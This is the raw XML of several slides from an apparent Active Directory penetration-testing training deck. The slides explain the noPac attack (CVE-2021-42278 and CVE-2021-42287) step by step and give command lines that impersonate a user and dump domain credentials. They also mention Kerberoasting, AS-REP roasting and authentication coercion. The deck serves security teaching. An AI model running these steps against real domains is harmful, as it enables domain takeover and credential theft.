              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>  Run Bloodhound to see which hosts the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>backup </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>user has access to</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Attempt to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Kerberoast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>, do you get any user back?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>What about ASREP roasting?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="662988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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>noPac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Abuse</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43</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58302"/>
            <a:ext cx="5230297" cy="2773102"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>noPac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> abuses two CVE's: (CVE-2021-42278 and CVE-2021-42287)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="2" indent="-140970"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>CVE-2021-42278: allows the creation of machine accounts without the $ symbol.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="2" indent="-140970"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>CVE-2021-42287: A logic flaw in the way Kerberos will access tickets and tokens when an account does not exist.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-285750">
              <a:buFont typeface=".AppleSystemUIFont" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-285750">
              <a:buFont typeface=".AppleSystemUIFont" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface=".AppleSystemUIFont" charset="-120"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>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6" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A9DB279-0873-2F74-C975-B4C083E57CB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5805298" y="521034"/>
            <a:ext cx="2359403" cy="4114799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4145975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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>noPac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Abuse : Exploitation Steps</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44</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290909"/>
            <a:ext cx="7759703" cy="2221595"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1">
              <a:buFont typeface="Arial" charset="-120"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>By default all users in a domain can create up to ten machine accounts. This is due to authenticated users having the privilege of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>SeMachineAccountPrivilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Create a new computer account with any random name</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Clear the SPN's</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Change the name of your newly created computer account to replicate the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>SamAccountName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>of a domain controller</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-285750">
              <a:buFont typeface=".AppleSystemUIFont" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-285750">
              <a:buFont typeface=".AppleSystemUIFont" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface=".AppleSystemUIFont" charset="-120"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>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7" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A60DF005-C67E-0430-3D5A-8C8FB5022792}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1730506" y="2784382"/>
            <a:ext cx="5372100" cy="2055334"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BB67282-8003-9413-E3C2-7550D621D121}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4518297" y="3728359"/>
            <a:ext cx="2367784" cy="95366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lvl="1" indent="0" defTabSz="914400">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" kern="0" dirty="0">
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0" defTabSz="914400">
              <a:buFont typeface=".AppleSystemUIFont" charset="-120"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" kern="0" dirty="0">
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4128087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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>noPac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Abuse : Exploitation Steps Continued</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45</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58302"/>
            <a:ext cx="5707995" cy="1843997"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Now to abuse the Kerberos side of the bug.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>1. First request a TGT in the name of the machine account you created in step 1.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>2. Then change the name of the computer account back to its original value.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>3. Request a TGS for the LDAP service using the TGT from the computer account we created and just renamed. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>4. Because the computer account with that name no longer exists, Kerberos will look for that same computer account with the dollar sign – which just so happens to be the name of the domain controller account.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>5. We gain admin access to the service. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buFont typeface=".AppleSystemUIFont" charset="-120"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-285750">
              <a:buFont typeface=".AppleSystemUIFont" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buFont typeface=".AppleSystemUIFont" charset="-120"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-285750">
              <a:buFont typeface=".AppleSystemUIFont" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>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
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BB67282-8003-9413-E3C2-7550D621D121}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4518297" y="3728359"/>
            <a:ext cx="2367784" cy="95366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lvl="1" indent="0" defTabSz="914400">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" kern="0" dirty="0">
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0" defTabSz="914400">
              <a:buFont typeface=".AppleSystemUIFont" charset="-120"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" kern="0" dirty="0">
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD77C4A5-FB47-E1F8-F6AA-AC16666752C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5973679" y="1190910"/>
            <a:ext cx="2743199" cy="2466906"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1796553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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>noPac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Abuse : Easy Linux Exploitation</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2022</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46</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58302"/>
            <a:ext cx="4918478" cy="2747171"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>How can we abuse this from Linux?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-140970"/>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>cme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> &lt;DC&gt; -u &lt;u&gt; -p &lt;p&gt; -M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>nopac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-140970"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>python noPac.py </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>domain.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>username:password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> -dc-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>dcip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> -dc-host $dc01 --impersonate $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>userToImpersonate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> –dump</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>It's that easy!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buFont typeface=".AppleSystemUIFont" charset="-120"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buFont typeface=".AppleSystemUIFont" charset="-120"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-285750">
              <a:buFont typeface=".AppleSystemUIFont" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>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6" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03CB973D-857A-006F-1E8F-FAE32D1BAE9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5173580" y="916484"/>
            <a:ext cx="3765883" cy="2815410"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1754374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Authentication Coercion</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47</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1" name="Picture 11" descr="auth-coercion-1.drawio.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BC84B34-6BA5-AE7F-B0CC-331CEC6F3969}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1113462" y="742906"/>
            <a:ext cx="6114407" cy="4068654"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 12" descr="auth-coercion-2.drawio.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B58FA3E6-3EA6-C459-9925-1E714D25405E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
